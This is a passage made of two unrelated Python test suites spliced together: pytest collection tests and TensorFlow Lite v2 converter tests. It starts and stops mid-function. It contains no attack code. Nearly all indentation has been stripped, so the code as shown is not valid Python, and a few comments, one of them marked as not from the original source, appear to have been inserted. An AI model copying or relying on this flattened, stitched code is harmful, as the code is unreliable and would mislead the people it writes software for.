aaa = testdir.mkpydir("aaa")
bbb = testdir.mkpydir("bbb")
test_aaa = aaa.join("test_aaa.py")
p.copy(test_aaa)
test_bbb = bbb.join("test_bbb.py")
p.move(test_bbb)
id = "."
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 2
pprint.pprint(hookrec.calls)
hookrec.assert_contains(
[
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'aaa/test_aaa.py'"),
("pytest_collectstart", "collector.fspath == test_bbb"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'bbb/test_bbb.py'"),
]
)
def test_serialization_byid(self, testdir):
testdir.makepyfile("def test_func(): pass")
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
(item,) = items
items2, hookrec = testdir.inline_genitems(item.nodeid)
(item2,) = items2
assert item2.name == item.name
assert item2.fspath == item.fspath
def test_find_byid_without_instance_parents(self, testdir):
p = testdir.makepyfile(
"""
class TestClass(object):
def test_method(self):
pass
"""
)
arg = p.basename + "::TestClass::test_method"
items, hookrec = testdir.inline_genitems(arg)
assert len(items) == 1
(item,) = items
assert item.nodeid.endswith("TestClass::test_method")
# ensure we are reporting the collection of the single test item (#2464)
assert [x.name for x in self.get_reported_items(hookrec)] == ["test_method"]
class Test_getinitialnodes(object):
def test_global_file(self, testdir, tmpdir):
x = tmpdir.ensure("x.py")
with tmpdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert isinstance(col, pytest.Module)
assert col.name == "x.py"
assert col.parent.parent is None
for col in col.listchain():
assert col.config is config
def test_pkgfile(self, testdir):
"""Verify nesting when a module is within a package.
The parent chain should match: Module<x.py> -> Package<subdir> -> Session.
Session's parent should always be None.
"""
tmpdir = testdir.tmpdir
subdir = tmpdir.join("subdir")
x = subdir.ensure("x.py")
subdir.ensure("__init__.py")
with subdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert col.name == "x.py"
assert isinstance(col, pytest.Module)
assert isinstance(col.parent, pytest.Package)
assert isinstance(col.parent.parent, pytest.Session)
# session is batman (has no parents)
assert col.parent.parent.parent is None
for col in col.listchain():
assert col.config is config
class Test_genitems(object):
def test_check_collect_hashes(self, testdir):
p = testdir.makepyfile(
"""
def test_1():
pass
def test_2():
pass
"""
)
p.copy(p.dirpath(p.purebasename + "2" + ".py"))
items, reprec = testdir.inline_genitems(p.dirpath())
assert len(items) == 4
for numi, i in enumerate(items):
for numj, j in enumerate(items):
if numj != numi:
assert hash(i) != hash(j)
assert i != j
def test_example_items1(self, testdir):
p = testdir.makepyfile(
"""
def testone():
pass
class TestX(object):
def testmethod_one(self):
pass
class TestY(TestX):
pass
"""
)
items, reprec = testdir.inline_genitems(p)
assert len(items) == 3
assert items[0].name == "testone"
assert items[1].name == "testmethod_one"
assert items[2].name == "testmethod_one"
# let's also test getmodpath here
assert items[0].getmodpath() == "testone"
assert items[1].getmodpath() == "TestX.testmethod_one"
assert items[2].getmodpath() == "TestY.testmethod_one"
s = items[0].getmodpath(stopatmodule=False)
assert s.endswith("test_example_items1.testone")
print(s)
def test_class_and_functions_discovery_using_glob(self, testdir):
"""
tests that python_classes and python_functions config options work
as prefixes and glob-like patterns (issue #600).
"""
testdir.makeini(
"""
[pytest]
python_classes = *Suite Test
python_functions = *_test test
"""
)
p = testdir.makepyfile(
"""
class MyTestSuite(object):
def x_test(self):
pass
class TestCase(object):
def test_y(self):
pass
"""
)
items, reprec = testdir.inline_genitems(p)
ids = [x.getmodpath() for x in items]
assert ids == ["MyTestSuite.x_test", "TestCase.test_y"]
def test_matchnodes_two_collections_same_file(testdir):
testdir.makeconftest(
"""
import pytest
def pytest_configure(config):
config.pluginmanager.register(Plugin2())
class Plugin2(object):
def pytest_collect_file(self, path, parent):
if path.ext == ".abc":
return MyFile2(path, parent)
def pytest_collect_file(path, parent):
if path.ext == ".abc":
return MyFile1(path, parent)
class MyFile1(pytest.Item, pytest.File):
def runtest(self):
pass
class MyFile2(pytest.File):
def collect(self):
return [Item2("hello", parent=self)]
class Item2(pytest.Item):
def runtest(self):
pass
"""
)
p = testdir.makefile(".abc", "")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines(["*2 passed*"])
res = testdir.runpytest("%s::hello" % p.basename)
res.stdout.fnmatch_lines(["*1 passed*"])
class TestNodekeywords(object):
def test_no_under(self, testdir):
modcol = testdir.getmodulecol(
"""
def test_pass(): pass
def test_fail(): assert 0
"""
)
values = list(modcol.keywords)
assert modcol.name in values
for x in values:
assert not x.startswith("_")
assert modcol.name in repr(modcol.keywords)
def test_issue345(self, testdir):
testdir.makepyfile(
"""
def test_should_not_be_selected():
assert False, 'I should not have been selected to run'
def test___repr__():
pass
"""
)
reprec = testdir.inline_run("-k repr")
reprec.assertoutcome(passed=1, failed=0)
COLLECTION_ERROR_PY_FILES = dict(
test_01_failure="""
def test_1():
assert False
""",
test_02_import_error="""
import asdfasdfasdf
def test_2():
assert True
""",
test_03_import_error="""
import asdfasdfasdf
def test_3():
assert True
""",
test_04_success="""
def test_4():
assert True
""",
)
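# The dict above is passed to testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
# in the tests below, creating four modules: two that fail at import time
# (collection errors), one with a failing test and one with a passing test.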
def test_exit_on_collection_error(testdir):
"""Verify that all collection errors are collected and no tests executed"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest()
assert res.ret == 2
res.stdout.fnmatch_lines(
[
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
]
)
def test_exit_on_collection_with_maxfail_smaller_than_n_errors(testdir):
"""
    Verify collection is aborted once maxfail errors are encountered, ignoring
    further modules which would cause more collection errors.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=1")
assert res.ret == 1
res.stdout.fnmatch_lines(
["*ERROR collecting test_02_import_error.py*", "*No module named *asdfa*"]
)
assert "test_03" not in res.stdout.str()
def test_exit_on_collection_with_maxfail_bigger_than_n_errors(testdir):
"""
Verify the test run aborts due to collection errors even if maxfail count of
errors was not reached.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=4")
assert res.ret == 2
res.stdout.fnmatch_lines(
[
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
]
)
def test_continue_on_collection_errors(testdir):
"""
    Verify tests are executed even when collection errors occur, as long as the
    --continue-on-collection-errors flag is set.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors")
assert res.ret == 1
res.stdout.fnmatch_lines(
["collected 2 items / 2 errors", "*1 failed, 1 passed, 2 error*"]
)
def test_continue_on_collection_errors_maxfail(testdir):
"""
Verify tests are executed even when collection errors occur and that maxfail
is honoured (including the collection error count).
4 tests: 2 collection errors + 1 failure + 1 success
test_4 is never executed because the test run is with --maxfail=3 which
means it is interrupted after the 2 collection errors + 1 failure.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors", "--maxfail=3")
assert res.ret == 1
res.stdout.fnmatch_lines(["collected 2 items / 2 errors", "*1 failed, 2 error*"])
def test_fixture_scope_sibling_conftests(testdir):
"""Regression test case for https://github.com/pytest-dev/pytest/issues/2836"""
foo_path = testdir.mkdir("foo")
foo_path.join("conftest.py").write(
textwrap.dedent(
"""\
import pytest
@pytest.fixture
def fix():
return 1
"""
)
)
foo_path.join("test_foo.py").write("def test_foo(fix): assert fix == 1")
# Tests in `food/` should not see the conftest fixture from `foo/`
food_path = testdir.mkpydir("food")
food_path.join("test_food.py").write("def test_food(fix): assert fix == 1")
res = testdir.runpytest()
assert res.ret == 1
res.stdout.fnmatch_lines(
[
"*ERROR at setup of test_food*",
"E*fixture 'fix' not found",
"*1 passed, 1 error*",
]
)
def test_collect_init_tests(testdir):
"""Check that we collect files from __init__.py files when they patch the 'python_files' (#3773)"""
p = testdir.copy_example("collect/collect_init_tests")
result = testdir.runpytest(p, "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package *",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
result = testdir.runpytest("./tests", "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package *",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
# Ignores duplicates with "." and pkginit (#4310).
result = testdir.runpytest("./tests", ".", "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package */tests>",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
# Same as before, but different order.
result = testdir.runpytest(".", "tests", "--collect-only")
result.stdout.fnmatch_lines(
[
"collected 2 items",
"<Package */tests>",
" <Module __init__.py>",
" <Function test_init>",
" <Module test_foo.py>",
" <Function test_foo>",
]
)
result = testdir.runpytest("./tests/test_foo.py", "--collect-only")
result.stdout.fnmatch_lines(
["<Package */tests>", " <Module test_foo.py>", " <Function test_foo>"]
)
assert "test_init" not in result.stdout.str()
result = testdir.runpytest("./tests/__init__.py", "--collect-only")
result.stdout.fnmatch_lines(
["<Package */tests>", " <Module __init__.py>", " <Function test_init>"]
)
assert "test_foo" not in result.stdout.str()
def test_collect_invalid_signature_message(testdir):
"""Check that we issue a proper message when we can't determine the signature of a test
function (#4026).
"""
testdir.makepyfile(
"""
import pytest
class TestCase:
@pytest.fixture
def fix():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
["Could not determine arguments of *.fix *: invalid method signature"]
)
def test_collect_handles_raising_on_dunder_class(testdir):
"""Handle proxy classes like Django's LazySettings that might raise on
``isinstance`` (#4266).
"""
testdir.makepyfile(
"""
class ImproperlyConfigured(Exception):
pass
class RaisesOnGetAttr(object):
def raises(self):
raise ImproperlyConfigured
__class__ = property(raises)
raises = RaisesOnGetAttr()
def test_1():
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*1 passed in*"])
assert result.ret == 0
def test_collect_with_chdir_during_import(testdir):
subdir = testdir.tmpdir.mkdir("sub")
testdir.tmpdir.join("conftest.py").write(
textwrap.dedent(
"""
import os
os.chdir(%r)
"""
% (str(subdir),)
)
)
testdir.makepyfile(
"""
def test_1():
import os
assert os.getcwd() == %r
"""
% (str(subdir),)
)
with testdir.tmpdir.as_cwd():
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*1 passed in*"])
assert result.ret == 0
# Handles relative testpaths.
testdir.makeini(
"""
[pytest]
testpaths = .
"""
)
with testdir.tmpdir.as_cwd():
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines(["collected 1 item"])
def test_collect_pyargs_with_testpaths(testdir, monkeypatch):
testmod = testdir.mkdir("testmod")
# NOTE: __init__.py is not collected since it does not match python_files.
testmod.ensure("__init__.py").write("def test_func(): pass")
testmod.ensure("test_file.py").write("def test_func(): pass")
root = testdir.mkdir("root")
root.ensure("pytest.ini").write(
textwrap.dedent(
"""
[pytest]
addopts = --pyargs
testpaths = testmod
"""
)
)
monkeypatch.setenv("PYTHONPATH", str(testdir.tmpdir), prepend=os.pathsep)
with root.as_cwd():
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed in*"])
@pytest.mark.skipif(
not hasattr(py.path.local, "mksymlinkto"),
reason="symlink not available on this platform",
)
def test_collect_symlink_file_arg(testdir):
"""Test that collecting a direct symlink, where the target does not match python_files works (#4325)."""
real = testdir.makepyfile(
real="""
def test_nodeid(request):
assert request.node.nodeid == "real.py::test_nodeid"
"""
)
symlink = testdir.tmpdir.join("symlink.py")
symlink.mksymlinkto(real)
result = testdir.runpytest("-v", symlink)
result.stdout.fnmatch_lines(["real.py::test_nodeid PASSED*", "*1 passed in*"])
assert result.ret == 0
@pytest.mark.skipif(
not hasattr(py.path.local, "mksymlinkto"),
reason="symlink not available on this platform",
)
def test_collect_symlink_out_of_tree(testdir):
"""Test collection of symlink via out-of-tree rootdir."""
sub = testdir.tmpdir.join("sub")
real = sub.join("test_real.py")
real.write(
textwrap.dedent(
"""
def test_nodeid(request):
# Should not contain sub/ prefix.
assert request.node.nodeid == "test_real.py::test_nodeid"
"""
),
ensure=True,
)
out_of_tree = testdir.tmpdir.join("out_of_tree").ensure(dir=True)
symlink_to_sub = out_of_tree.join("symlink_to_sub")
symlink_to_sub.mksymlinkto(sub)
sub.chdir()
result = testdir.runpytest("-vs", "--rootdir=%s" % sub, symlink_to_sub)
result.stdout.fnmatch_lines(
[
# Should not contain "sub/"!
"test_real.py::test_nodeid PASSED"
]
)
assert result.ret == 0
def test_collectignore_via_conftest(testdir, monkeypatch):
"""collect_ignore in parent conftest skips importing child (issue #4592)."""
tests = testdir.mkpydir("tests")
tests.ensure("conftest.py").write("collect_ignore = ['ignore_me']")
ignore_me = tests.mkdir("ignore_me")
ignore_me.ensure("__init__.py")
ignore_me.ensure("conftest.py").write("assert 0, 'should_not_be_called'")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
def test_collect_pkg_init_and_file_in_args(testdir):
subdir = testdir.mkdir("sub")
init = subdir.ensure("__init__.py")
init.write("def test_init(): pass")
p = subdir.ensure("test_file.py")
p.write("def test_file(): pass")
# NOTE: without "-o python_files=*.py" this collects test_file.py twice.
# This changed/broke with "Add package scoped fixtures #2283" (2b1410895)
# initially (causing a RecursionError).
result = testdir.runpytest("-v", str(init), str(p))
result.stdout.fnmatch_lines(
[
"sub/test_file.py::test_file PASSED*",
"sub/test_file.py::test_file PASSED*",
"*2 passed in*",
]
)
result = testdir.runpytest("-v", "-o", "python_files=*.py", str(init), str(p))
result.stdout.fnmatch_lines(
[
"sub/__init__.py::test_init PASSED*",
"sub/test_file.py::test_file PASSED*",
"*2 passed in*",
]
)
def test_collect_pkg_init_only(testdir):
subdir = testdir.mkdir("sub")
init = subdir.ensure("__init__.py")
init.write("def test_init(): pass")
result = testdir.runpytest(str(init))
result.stdout.fnmatch_lines(["*no tests ran in*"])
result = testdir.runpytest("-v", "-o", "python_files=*.py", str(init))
result.stdout.fnmatch_lines(["sub/__init__.py::test_init PASSED*", "*1 passed in*"])
@pytest.mark.skipif(
not hasattr(py.path.local, "mksymlinkto"),
reason="symlink not available on this platform",
)
@pytest.mark.parametrize("use_pkg", (True, False))
def test_collect_sub_with_symlinks(use_pkg, testdir):
sub = testdir.mkdir("sub")
if use_pkg:
sub.ensure("__init__.py")
sub.ensure("test_file.py").write("def test_file(): pass")
# Create a broken symlink.
sub.join("test_broken.py").mksymlinkto("test_doesnotexist.py")
# Symlink that gets collected.
sub.join("test_symlink.py").mksymlinkto("test_file.py")
result = testdir.runpytest("-v", str(sub))
result.stdout.fnmatch_lines(
[
"sub/test_file.py::test_file PASSED*",
"sub/test_symlink.py::test_file PASSED*",
"*2 passed in*",
]
)
def test_collector_respects_tbstyle(testdir):
p1 = testdir.makepyfile("assert 0")
result = testdir.runpytest(p1, "--tb=native")
assert result.ret == EXIT_INTERRUPTED
result.stdout.fnmatch_lines(
[
"*_ ERROR collecting test_collector_respects_tbstyle.py _*",
"Traceback (most recent call last):",
' File "*/test_collector_respects_tbstyle.py", line 1, in <module>',
" assert 0",
"AssertionError: assert 0",
"*! Interrupted: 1 errors during collection !*",
"*= 1 error in *",
]
)
|
|
# Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py functionality related to TensorFlow 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import numpy as np
from six.moves import range
from six.moves import zip
from tensorflow.lite.python import lite
from tensorflow.lite.python.interpreter import Interpreter
from tensorflow.python import keras
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.keras.layers import recurrent
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.saved_model import save_options
from tensorflow.python.saved_model.save import save
from tensorflow.python.training.tracking import tracking
class TestModels(test_util.TensorFlowTestCase, parameterized.TestCase):
def _evaluateTFLiteModel(self, tflite_model, input_data, input_shapes=None):
"""Evaluates the model on the `input_data`.
Args:
tflite_model: TensorFlow Lite model.
input_data: List of EagerTensor const ops containing the input data for
each input tensor.
input_shapes: List of tuples representing the `shape_signature` and the
new shape of each input tensor that has unknown dimensions.
Returns:
[np.ndarray]
"""
interpreter = Interpreter(model_content=tflite_model)
input_details = interpreter.get_input_details()
if input_shapes:
for idx, (shape_signature, final_shape) in enumerate(input_shapes):
self.assertTrue(
(input_details[idx]['shape_signature'] == shape_signature).all())
interpreter.resize_tensor_input(idx, final_shape)
interpreter.allocate_tensors()
output_details = interpreter.get_output_details()
for input_tensor, tensor_data in zip(input_details, input_data):
interpreter.set_tensor(input_tensor['index'], tensor_data.numpy())
interpreter.invoke()
return [
interpreter.get_tensor(details['index']) for details in output_details
]
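  # Illustrative note (hypothetical shapes): when a model has an unknown batch
  # dimension, input_shapes is passed as e.g. [([1, -1, 3], [1, 5, 3])], i.e.
  # the expected shape_signature followed by the concrete shape to resize the
  # tensor to before allocate_tensors().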
def _getSimpleVariableModel(self):
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
return root
def _getMultiFunctionModel(self):
class BasicModel(tracking.AutoTrackable):
def __init__(self):
self.y = None
self.z = None
@def_function.function
def add(self, x):
if self.y is None:
self.y = variables.Variable(2.)
return x + self.y
@def_function.function
def sub(self, x):
if self.z is None:
self.z = variables.Variable(3.)
return x - self.z
return BasicModel()
def _assertValidDebugInfo(self, debug_info):
"""Verify the DebugInfo is valid."""
file_names = set()
for file_path in debug_info.files:
file_names.add(os.path.basename(file_path))
# To make the test independent on how the nodes are created, we only assert
# the name of this test file.
self.assertIn('lite_v2_test.py', file_names)
self.assertNotIn('lite_test.py', file_names)
class FromConcreteFunctionTest(TestModels):
@test_util.run_v2_only
def testTypeInvalid(self):
root = self._getSimpleVariableModel()
with self.assertRaises(ValueError) as error:
_ = lite.TFLiteConverterV2.from_concrete_functions([root.f])
self.assertIn('call from_concrete_function', str(error.exception))
@parameterized.named_parameters(
('EnableMlirConverter', True), # enable mlir
('DisableMlirConverter', False)) # disable mlir
@test_util.run_v2_only
def testFloat(self, enable_mlir):
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[1])
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = enable_mlir
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testScalarInput(self):
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[])
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testMultiFunctionModel(self):
"""Convert a single model in a multi-functional model."""
root = self._getMultiFunctionModel()
input_data = constant_op.constant(1., shape=[1])
concrete_func = root.add.get_concrete_function(input_data)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.add(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testConvertMultipleFunctions(self):
"""Convert multiple functions in a multi-functional model."""
root = self._getMultiFunctionModel()
input_data = constant_op.constant(1., shape=[1])
add_func = root.add.get_concrete_function(input_data)
sub_func = root.sub.get_concrete_function(input_data)
# Try converting multiple functions.
converter = lite.TFLiteConverterV2.from_concrete_functions(
[add_func, sub_func])
with self.assertRaises(ValueError) as error:
_ = converter.convert()
self.assertIn('can only convert a single ConcreteFunction',
str(error.exception))
def _getCalibrationQuantizeModel(self):
np.random.seed(0)
root = tracking.AutoTrackable()
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[1, 5, 5, 3], dtype=dtypes.float32)
])
def func(inp):
conv = nn_ops.conv2d(
inp,
filter=array_ops.ones([3, 3, 3, 16]),
strides=[1, 1, 1, 1],
padding='SAME')
output = nn_ops.relu(conv, name='output')
return output
def calibration_gen():
for _ in range(5):
yield [np.random.uniform(-1, 1, size=(1, 5, 5, 3)).astype(np.float32)]
root.f = func
to_save = root.f.get_concrete_function()
return (to_save, calibration_gen)
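  # Note (descriptive, not from the original source): calibration_gen is used
  # as the representative_dataset generator below; each yielded value is a
  # list with one array per model input, and the five random samples are only
  # used to calibrate quantization ranges.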
def testPostTrainingCalibrateAndQuantize(self):
func, calibration_gen = self._getCalibrationQuantizeModel()
# Convert float model.
float_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
float_tflite = float_converter.convert()
self.assertTrue(float_tflite)
# Convert quantized model.
quantized_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
quantized_converter.optimizations = [lite.Optimize.DEFAULT]
quantized_converter.representative_dataset = calibration_gen
quantized_tflite = quantized_converter.convert()
self.assertTrue(quantized_tflite)
# The default input and output types should be float.
interpreter = Interpreter(model_content=quantized_tflite)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertLen(input_details, 1)
self.assertEqual(np.float32, input_details[0]['dtype'])
output_details = interpreter.get_output_details()
self.assertLen(output_details, 1)
self.assertEqual(np.float32, output_details[0]['dtype'])
# Ensure that the quantized weights tflite model is smaller.
self.assertLess(len(quantized_tflite), len(float_tflite))
def testCalibrateAndQuantizeBuiltinInt8(self):
func, calibration_gen = self._getCalibrationQuantizeModel()
# Convert float model.
float_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
float_tflite = float_converter.convert()
self.assertTrue(float_tflite)
# Convert model by specifying target spec (instead of optimizations), since
# when targeting an integer only backend, quantization is mandatory.
quantized_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
quantized_converter.target_spec.supported_ops = [
lite.OpsSet.TFLITE_BUILTINS_INT8
]
quantized_converter.representative_dataset = calibration_gen
quantized_tflite = quantized_converter.convert()
self.assertTrue(quantized_tflite)
# The default input and output types should be float.
interpreter = Interpreter(model_content=quantized_tflite)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertLen(input_details, 1)
self.assertEqual(np.float32, input_details[0]['dtype'])
output_details = interpreter.get_output_details()
self.assertLen(output_details, 1)
self.assertEqual(np.float32, output_details[0]['dtype'])
# Ensure that the quantized weights tflite model is smaller.
self.assertLess(len(quantized_tflite), len(float_tflite))
@test_util.run_v2_only
def testNewQuantizer(self):
"""Test the model quantized by the new converter."""
func, calibration_gen = self._getCalibrationQuantizeModel()
quantized_converter = lite.TFLiteConverterV2.from_concrete_functions([func])
quantized_converter.target_spec.supported_ops = [
lite.OpsSet.TFLITE_BUILTINS_INT8
]
quantized_converter.representative_dataset = calibration_gen
# default quantizer
quantized_converter.experimental_new_quantizer = False
old_tflite = quantized_converter.convert()
# new quantizer
quantized_converter.experimental_new_quantizer = True
new_tflite = quantized_converter.convert()
for _ in range(5):
input_data = constant_op.constant(
np.random.uniform(-1, 1, size=(1, 5, 5, 3)).astype(np.float32))
old_value = self._evaluateTFLiteModel(old_tflite, [input_data])
new_value = self._evaluateTFLiteModel(new_tflite, [input_data])
np.testing.assert_almost_equal(old_value, new_value, 1)
@parameterized.named_parameters(
('EnableMlirConverter', True), # enable mlir
('DisableMlirConverter', False)) # disable mlir
@test_util.run_v2_only
def testEmbeddings(self, enable_mlir):
"""Test model with embeddings."""
input_data = constant_op.constant(
np.array(np.random.random_sample((20)), dtype=np.int32))
class EmbeddingModel(keras.Model):
def __init__(self):
super(EmbeddingModel, self).__init__()
self.shared_weights = self.add_weight(
'weights',
shape=(2000, 300),
dtype=dtypes.float32,
initializer=init_ops.random_normal_initializer(
mean=0.0, stddev=300**(-0.5)))
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=(20), dtype=dtypes.int32)
])
def func(self, x):
return array_ops.gather(self.shared_weights, x)
# Building the model.
root = EmbeddingModel()
concrete_func = root.func.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = enable_mlir
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.func(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0], 5)
@test_util.run_v2_only
def testGraphDebugInfo(self):
"""Test a concrete function has debug info captured."""
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.f = def_function.function(lambda x: root.v1 * x)
input_data = constant_op.constant(1., shape=[1])
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.convert()
self._assertValidDebugInfo(converter._debug_info)
class FromSavedModelTest(TestModels):
@test_util.run_v2_only
def testConstModel(self):
"""Test a basic model with functions to make sure functions are inlined."""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.f = def_function.function(lambda x: 2. * x)
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testVariableModel(self):
"""Test a basic model with Variables with saving/loading the SavedModel."""
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[1])
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testSignatures(self):
"""Test values for `signature_keys` argument."""
root = self._getSimpleVariableModel()
input_data = constant_op.constant(1., shape=[1])
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save)
# Convert model with invalid `signature_keys`.
with self.assertRaises(ValueError) as error:
_ = lite.TFLiteConverterV2.from_saved_model(
save_dir, signature_keys=['INVALID'])
self.assertIn("Invalid signature key 'INVALID'", str(error.exception))
# Convert model with empty `signature_keys`.
converter = lite.TFLiteConverterV2.from_saved_model(
save_dir, signature_keys=[])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testMultipleFunctionModel(self):
"""Convert multiple functions in a multi-functional model."""
root = self._getMultiFunctionModel()
input_data = constant_op.constant(1., shape=[1])
add_func = root.add.get_concrete_function(input_data)
sub_func = root.sub.get_concrete_function(input_data)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, {'add': add_func, 'sub': sub_func})
# Ensure the converter is created and captures both functions.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
self.assertLen(converter._funcs, 2)
# Try converting multiple functions.
with self.assertRaises(ValueError) as error:
_ = converter.convert()
self.assertIn('This converter can only convert a single ConcreteFunction',
str(error.exception))
@test_util.run_v2_only
def testKerasSequentialModel(self):
"""Test a simple sequential tf.Keras model."""
input_data = constant_op.constant(1., shape=[1, 1])
x = np.array([[1.], [2.]])
y = np.array([[2.], [4.]])
model = keras.models.Sequential([
keras.layers.Dropout(0.2),
keras.layers.Dense(1),
])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit(x, y, epochs=1)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(model, save_dir)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = model.predict(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
